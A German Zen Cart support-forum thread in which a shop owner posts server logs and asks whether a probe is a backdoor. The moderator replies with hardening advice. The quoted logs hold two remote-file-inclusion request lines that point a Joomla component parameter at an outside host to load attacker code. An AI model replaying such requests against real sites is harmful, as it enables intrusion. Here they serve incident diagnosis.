Ergebnis 1 bis 3 von 3

Thema: gehackt?

  1. #1
    Padawan Stufe I Avatar von rolli
    Registriert seit
    28.04.2009
    Beiträge
    40
    Themen
    20
    DANKE
    0
    Erhaltene Danke: 0

    Standard gehackt?

    ich fand folgende logfiles:

    und fand, dass bei joomla and wordpress installationen dies ein backdoor ist, der Passwörter ausspioniert. Hat jemand sowas schon mal gesehen?

    Grüsse
    rolli







    /shop//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.blix.cc/images/b Http Code: 404 Date: Jun 28 15:30:29 Http Version: HTTP/1.1 Size in Bytes: - Referer: - Agent: libwww-perl/5.803






    //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.blix.cc/images/bottom Http Code: 404 Date: Jun 28 15:30:29 Http Version: HTTP/1.1 Size in Bytes: - Referer: - Agent: libwww-perl/5.803

  2. #2
    Jedi-Ritter Avatar von webchills
    Registriert seit
    30.10.2004
    Ort
    Österreich
    Beiträge
    6.093
    Themen
    85
    DANKE
    3
    Erhaltene Danke: 962

    Standard

    Scheint mir nichts mit Zen-Cart zu tun zu haben, richtet sich eher gegen Joomla.
    Ganz unabhängig davon rate ich Dir dringend, das admin Verzeichnis umzubenennen und den Patch hier einzuspielen:
    https://www.zen-cart-pro.at/forum/showthread.php?t=6470
    !!! kostenloser Support ausschließlich im Forum - Nicht per Email, nicht per Telefon und nicht per PM !!!

  3. #3
    Padawan Stufe I Avatar von rolli
    Registriert seit
    28.04.2009
    Beiträge
    40
    Themen
    20
    DANKE
    0
    Erhaltene Danke: 0
    Erstellt von

    Standard

    Super...tolle info......
    Ich habe mittlerweile meinen Provider gefragt, und der sagt, dass das ein backdoor ist um Passwörter abzufragen, aber dass mein space gschützt sei, weil diese Abfrage als verboten eingestuft sei. Ich werde allerdings dein Vorgehen ebenfalls vornehmen.

    Merci

    rolli

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
zen-cart-pro.at
Zen Cart ist eine kostenlose unter der GPL-Lizenz veröffentlichte Open-Source Shopsoftware. Das System wird in den USA entwickelt, die amerikanische Website dazu ist www.zen-cart.com

Die deutsche Zen-Cart Version, um die es hier auf zen-cart-pro.at geht, ist eine Anpassung der amerikanischen Version an die Bedürfnisse von Onlineshopbetreibern im deutschsprachigen Raum.

Die deutsche Zen Cart Version wird von einem Team von Entwicklern in Österreich und Deutschland betreut, weiterentwickelt und supportet und steht kostenlos in unserem Downloadbereich zur Verfügung.

[mehr]
Follow Us
  • zen-cart-pro-at auf Twitter
  • zen-cart-pro-at auf Github
  • zen-cart-pro-at auf SourceForge
Aktuelle Version
Zen Cart 1.5.5 deutsch
Revision 1188 vom 02.12.2016
[Download]